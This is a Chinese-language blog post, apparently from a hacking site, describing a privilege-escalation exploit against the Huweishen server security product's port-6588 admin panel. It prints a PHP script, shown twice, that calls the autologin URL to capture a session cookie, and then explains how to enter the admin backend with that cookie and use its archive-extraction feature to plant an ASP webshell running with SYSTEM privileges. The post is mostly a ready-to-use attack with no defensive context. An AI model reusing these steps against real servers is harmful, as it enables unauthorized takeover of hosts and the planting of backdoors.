护卫神6588端口提权漏洞

  • A+
所属分类:颓废's Blog
摘要

可执行脚本 <?php function httpGet() { $url = ‘https://www.0dayhack.com:6588/admin/index.asp?f=autologin’; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, TRUE); //表示需要response header curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_TIMEOUT, 120); $result = curl_exec($ch); return $result; } echo httpGet(); echo asd; ?> 上传脚本访问获取cookie,修改cookie访问:6588/admin/index.asp成功进入后台

利用支持解压包 解压包的内容是asp马 以护卫神的system权限达到提权


利用条件:

shell权限

可执行脚本

<?php function httpGet() {     $url = 'https://www.0dayhack.com:6588/admin/index.asp?f=autologin';     $ch = curl_init();     curl_setopt($ch, CURLOPT_URL, $url);     curl_setopt($ch, CURLOPT_HEADER, TRUE);    //表示需要response header     curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body     curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);     curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);     curl_setopt($ch, CURLOPT_TIMEOUT, 120);     $result = curl_exec($ch);     return $result; } echo httpGet(); echo asd; ?>

上传脚本访问获取cookie,修改cookie访问:6588/admin/index.asp成功进入后台

利用支持解压包 解压包的内容是asp马 以护卫神的system权限达到提权

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: